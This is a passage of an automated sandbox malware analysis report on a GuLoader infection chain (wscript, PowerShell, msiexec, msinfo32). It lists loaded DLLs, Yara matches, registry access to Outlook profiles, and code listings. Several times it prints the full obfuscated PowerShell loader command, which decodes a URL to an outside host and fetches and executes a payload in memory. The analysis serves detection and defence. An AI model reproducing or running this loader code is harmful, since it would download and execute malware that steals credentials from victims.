          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mfc42u.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Binary string: msinfo32.pdb source: msiexec.exe, 0000000B.00000003.2464231519.0000000024601000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bqm.Core.pdb4 source: powershell.exe, 00000006.00000002.2057275222.0000000008137000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000B.00000003.2397408093.00000000244C5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 0000000B.00000003.2397408093.00000000244C5000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe
          Source: Binary string: msinfo32.pdbGCTL source: msiexec.exe, 0000000B.00000003.2464231519.0000000024601000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000006.00000002.2059480573.000000000CD15000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2059188423.00000000085C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1862118797.0000020AF32F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Rentenedsttelsen)$gloBAl:GaRNisOnerEs = [SYSTem.texT.eNcOdING]::AScii.GETStRiNg($chemIStriES)$gLobaL:FORTiD=$GArNisONeReS.SuBStRING($DEfEnSiBLE,$CLOYmeNt112)<#Householding Semital Du
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Guanethidine $Regalizes $Victorianerne), (Angloficeret @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Blecidere = [AppDomain]::CurrentDomain.GetAssemblies
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Slotsholmen242)), $Reladling188).DefineDynamicModule($Ganelyd, $false).DefineType($jesyn, $Oddlegs, [System.MulticastDelegate])$Anatom
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Rentenedsttelsen)$gloBAl:GaRNisOnerEs = [SYSTem.texT.eNcOdING]::AScii.GETStRiNg($chemIStriES)$gLobaL:FORTiD=$GArNisONeReS.SuBStRING($DEfEnSiBLE,$CLOYmeNt112)<#Householding Semital Du
          Suspicious powershell command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadi
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadi
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadiJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8A7CD8 push eax; ret 4_2_00007FFD9B8A7CE1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B97BCB9 push ecx; iretd 4_2_00007FFD9B97BCBC
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08FC30C3 push es; ret 6_2_08FC30C4
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08FC4AA8 push ebx; ret 6_2_08FC4ABB
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08FC046B push cs; ret 6_2_08FC0491
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08FC304D push edi; iretd 6_2_08FC304F
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08FC393A push ecx; iretd 6_2_08FC393B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C84AA8 push ebx; ret 11_2_02C84ABB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C830C3 push es; ret 11_2_02C830C4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C8304D push edi; iretd 11_2_02C8304F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C8393A push ecx; iretd 11_2_02C8393B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C8046B push cs; ret 11_2_02C80491
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04E927FA pushad ; ret 13_2_04E927F9
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04E9225F pushad ; ret 13_2_04E927F9
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04E9283D push eax; iretd 13_2_04E92858
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC09AD push ecx; mov dword ptr [esp], ecx13_2_04EC09B6
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04E9B008 push es; iretd 13_2_04E9B009
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04E99939 push es; iretd 13_2_04E99940
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EBEAF6 push es; ret 13_2_02EBEB11
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EBEB00 push es; ret 13_2_02EBEB11
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EC0868 push FFFFFFB6h; retf 13_2_02EC086A
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02ECB399 push edi; ret 13_2_02ECB35C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02ECB34D push edi; ret 13_2_02ECB35C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02ECB350 push edi; ret 13_2_02ECB35C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EB7653 pushfd ; retf 13_2_02EB765C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EB75DB pushfd ; retf 13_2_02EB765C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02ECBA59 push es; retf 13_2_02ECBA5D
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EC9A09 push edi; ret 13_2_02EC9A0F
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D264F7 push eax; iretd 13_2_04D2650B
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D255C5 pushad ; ret 13_2_04D255C6
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2265E push edi; retf 13_2_04D22666
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
